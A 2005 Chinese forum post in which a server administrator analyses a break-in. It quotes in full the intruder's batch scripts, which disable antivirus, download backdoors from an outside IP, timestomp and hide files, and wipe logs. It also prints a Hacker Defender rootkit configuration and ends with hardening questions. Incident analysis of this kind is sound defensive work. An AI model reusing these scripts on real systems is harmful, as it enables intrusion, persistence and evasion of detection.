史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > 網路軟硬體架設技術文件
忘記密碼?
論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2005-03-11, 08:56 PM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 伺服器發生被黑,系統有問題.紀實

伺服器被黑,系統有問題紀實
伺服器被黑過了 但還好我留了後們。黑回來了 黑我的傢伙在我電腦上留的東西被我發現

了我在分析 明天把分析的東西分享給大家看 還有不懂的要大家幫忙了

但是系統還是不穩定 ,估計遭到了破壞。需要去一次機房 ,可能恢復是下周了


下面是整個程序:

3月7號發現伺服器ftp沒法登入。。。。晚上回家發現遠端登入admin密碼錯誤。。。。。

趕快問同事有沒有改過密碼。。。。。回答是否定的。。。。。慶幸的是以前為了確保可以正常登

錄除了終端外還留了個後門。。。。。。可以類似telnet的軟體,用 net user指令一查admin 發

現最後一次登入時間是3月6號臨晨1。13分。。。。。。。。。密碼修改時間是臨晨1。12

分。。。tmd!!

被黑了。。。。。


開始查問題。。。。。用net start 查可疑服務。。。。net user查可疑賬戶。。。。。沒啥異常

用netstat -n -a查連接的連接阜。。。。。看到的都是下載的ccfer們。。。。服務還好??

那說明沒遭到滅頂的破壞。。。。。最後開始著手找3月6號前後新增的文件。。。。。

希望黑我的傢伙留下些什麼。。。。。。什麼都沒。。。。。沒3月6號附近的。。。。。

其實當時我可以用net 指令把admin改回來,但是我不想先驚動 ,保護案發現場



轉折

考!!! 2001年的文件???

系統都是04年裝的 哪裡來2001年的? 當我白癡???

開始懷疑c碟根目錄下面一個01年的文件。。。。。我知道系統目錄下面有這種文件。。但是根目

錄下沒有放過dscn.exe的文件。。。。。。。。下載下來分析。。。

是一個自解壓的文件。本能的用winrar開啟 有這麼一段

Path=%systemroot%\system32
Setup=dscn.bat
Silent=1
Overwrite=1

解壓就啟動dscn.bat

這個bat內容
@echo off
net stop "Symantec AntiVirus Server"
關閉一系列殺毒軟體服務
net stop "Symantec AntiVirus Client"
net stop "Norton AntiVirus Server"
net stop "DefWatch"
net stop "V3MonSvc"
net stop "V3MonNT"
net stop "MonSvcNT"
net stop "navapsvc"
net stop "McShield"
net pause "Symantec AntiVirus Server"
net pause "Symantec AntiVirus Client"
net pause "Norton AntiVirus Server"
net pause "DefWatch"
net pause "V3MonSvc"
net pause "V3MonNT"
net pause "MonSvcNT"
net pause "navapsvc"
net pause "McShield"
@rem Download and Install BackDoor...
mget 211.234.117.167/ShellCn.exe
用解壓出來的mget.exe下載後門程式文件
ShellCn.exe
mget 211.234.117.167/injeSvchost.exe
injeSvchost.exe
mget 211.234.117.167/@.exe
mget 211.234.117.167/@.ini
mget 211.234.117.167/FileTime.exe
ren @.exe '.exe
ren @.ini '.ini
@filetime.exe %systemroot%\system32\'.exe %systemroot%\system32\drwatson.exe
修改新增文件日期!太噁心了 怪不的我找不到
@filetime.exe %systemroot%\system32\'.ini %systemroot%\system32\drwatson.exe
'.exe
'.exe
'.exe
net start IRMON
net start IRMON
@filetime.exe %systemroot%\system32\IRMON32.DLL %systemroot%\system32\drwatson.exe
@filetime.exe %systemroot%\system32\mget.exe %systemroot%\system32\drwatson.exe
@rem start FireWall... 恢復殺毒軟體
net start "Symantec AntiVirus Server"
net start "Symantec AntiVirus Client"
net start "Norton AntiVirus Server"
net start "DefWatch"
net start "V3MonSvc"
net start "V3MonNT"
net start "MonSvcNT"
net start "navapsvc"
net start "McShield"
@rem Clean Event
mget 211.234.117.167/LogKiller.exe
LogKiller.exe
del %systemroot%\system32\LogKiller.exe /f/s/q
del %systemroot%\system32\dscn.exe /f/s/q
del c:\dscn.exe
del c:\dscn.exe
del %systemroot%\system32\filetime.exe /f/s/q
del %systemroot%\system32\dscn.bat /f/s

注意211.234.117.167這個位址我查下來是韓國的。。。。千里迢迢來黑我?? 不是把?估計是用這個位址的軟體黑我的。下面是附件把後面RAR去掉就是原文件了


2 shellcn.exe

下載下來還有個shellcn.exe

也是執行就執行的批次處理
@echo off
@filetime.exe %systemroot%\system32\SYSTemCC.exe %systemroot%\system32\drwatson.exe
@filetime.exe %systemroot%\system32\SYSTemCC.DLL %systemroot%\system32\drwatson.exe
修改後門程序系統時間。。。。下流。。

@%systemroot%\system32\Inst.exe -uninstall SCardDrv
intst是一個系統服務安裝移除的工具
SCardSvr.exe 對插入在電腦智能卡閱讀器中的智能卡進行管理和訪問控制。(系統服務)
刪我這個服務幹嗎? 準備偽裝??

@%systemroot%\system32\SYSTemCC.exe -run

它種我後門了,但是這個東西我google找了怎麼來入侵呢?
@attrib +s +h %systemroot%\system32\SYSTemCC.DLL
@attrib +s +h %systemroot%\system32\SYSTemCC.exe
把後門植入程序加系統和隱藏內容。。。。
@del %systemroot%\system32\Inst.exe
@del %systemroot%\system32\filetime.exe
@del %systemroot%\system32\ShellCn.exe /f /s /q
@del %systemroot%\system32\ShellCn.exe /f /s /q
@del %systemroot%\system32\ShellCn.exe /f /s /q
@del c:\ShellCn.exe /f /s /q
@del c:\ShellCn.exe /f /s /q
@del c:\ShellCn.exe /f /s /q
@del %systemroot%\system32\ShellSetup.bat
移除所有犯罪證據


3 injeSvchost.exe

Path=%systemroot%\system32
SavePath
Setup=%systemroot%\system32\iNSTALL.bat
Silent=1
Overwrite=1
又是個自解壓就啟動批次處理的

iNSTALL.bat

@echo off
@filetime.exe %systemroot%\system32\IRMON.exe %systemroot%\system32\drwatson.exe
@filetime.exe %systemroot%\system32\IRMONS.DLL %systemroot%\system32\drwatson.exe
修改植入後門程序新增時間。。。。。再次逼視!!!!@%systemroot%\system32\IRMON.exe -install fuckyou fuckyou

這裡是我最看不下去的!!!IRMON.exe 是偽裝紅外線服務的一個後門。。原檔案名是portlessinst.exe

這個黑客程序介紹 http://www.xfocus.net/tools/200309/551.html

@net start IRMON
@net start IRMON
@net start IRMON
@net start IRMON

啟動後門程序

@del %systemroot%\system32\injeSvchost.exe /f /s /q
@del %systemroot%\system32\injeSvchost.exe /f /s /q
@del %systemroot%\system32\injeSvchost.exe /f /s /q
@del injeSvchost.exe /f /s /q
@del injeSvchost.exe /f /s /q
@del injeSvchost.exe /f /s /q
@del %systemroot%\system32\iNSTALL.bat /f /s /q
@rem If You FOUND the FILE,tell me ..Thanks
還是只是個普通的木馬程序, 可能用你那機器的人誤下了這個木馬?
另外, 那個bat文件從韓國的網址下那些程序, 並不能證明放木馬, 改密碼的人來自韓國吧.

接著.................
再兩個檔
4 @.exe
@.ini

分析這2個文件好像是隱藏連接阜和隱藏服務的一個工具 具體使用辦法找不到

不知道是不是以後能為我所用。。。。。請專業達人指教

@.ini 的相關內容
[Hidden Table]
'*
SYSTemC*
IRMON*
TInject*
inje*

[Root Processes]
'*
SYSTemC*
IRMON*
TInject*
inje*

[Hidden Services]
hxdef
Shell
IRMON

[Hidden RegKeys]
hxdef
Shell
IRMON

[Hidden Reg類型s]

[Startup Run]

[Free Space]

[Hidden Ports]
TCP:1055,21211,21212,21213,21234
UDP:55555

[Settings]
Password=
BackdoorShell=TInject.exe
FileMappingName=_.-=[How Are You?]=-._
ServiceName=hxdef
ServiceDisplayName=Internet Service Microsoft RootKit.
ServiceDescription=Internet Service Microsoft RootKit.
DriverName='
DriverFileName='.sys
最後。。。。。幾個問題 不知道誰能回答。。。。。

1 那小子怎麼繞進來的? 機器是伺服器 所以肯定不會有誰誤下載這個木馬。。。放機房的

2 分析整個程序 最早被我發現的dscn.exe肯定是要被移除了的 怎麼會留著啊?

3 admin密碼改會來了 系統為什麼還會出問題?? 現在登入不上去了 沒法查了

是不是沒清除乾淨後門?? 主要是不是有隱藏服務??

4 那個傢伙幹嗎和我過不去!!!!??? 啐口XXX嘛的

最後好像沒吸取到教訓 。。。。。。這是最怕的一世英名 。。。。。。

可以以後用的東西。。。。但用處不大 !這位謊忙?也掉些工具未收帶回?檢得寶物疑?

filetime.exe 修改文件新增時間工具

inst.exe service 服務安裝 刪除程式 ,這個東西不錯 小巧好用 而且可以改預設服務名

mget.exe cmd環境下 下載文件的小東東

分析..應是流行的...
HXDEF 1.0.0

,使用hxdefcli來連接,沒有密碼:!
狗狗搜尋了一下資料參考...

http://www.google.com/search?hl=zh-C...&lr=lang_zh-CN

這些批次處理不是一天兩天就可以寫出來的,不過很通用。證明這個人至少是有點來頭的。
注意關鍵是最初的文件怎麼放上去執行的。
檢查一下有沒有系統修正檔沒打,或者軟體漏洞?
有沒有不該起的服務正在執行?
那個IP一定是目標物。不過對於繞過那個IP的紀錄可以想點辦法來搞到。
最後有人推鑑,如果想抓到誰幹的,趕緊搞一個嗅探IDS在旁邊,恢復被黑的狀態,開始釣魚吧。:)

事後自我檢討,覺得最主要是搞清第一步怎麼上傳和執行的

該禁的服務全禁了嗎
所有目錄權限設為最小了嗎
註冊表shell相關的東西刪了嗎
站點之間權限隔離了嗎
靜態文件/指令碼/資料庫文件之間隔離了嗎
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
舊 2005-03-12, 11:23 PM   #2 (permalink)
註冊會員
榮譽勳章
UID - 22269
在線等級: 級別:6 | 在線時長:74小時 | 升級還需:3小時
註冊日期: 2003-01-05
VIP期限: 2008-04
文章: 304
精華: 0
現金: 6245 金幣
資產: 6245 金幣
預設

厲害,真是高手
pinga 目前離線  
送花文章: 266, 收花文章: 3 篇, 收花: 3 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 04:07 AM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2020, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1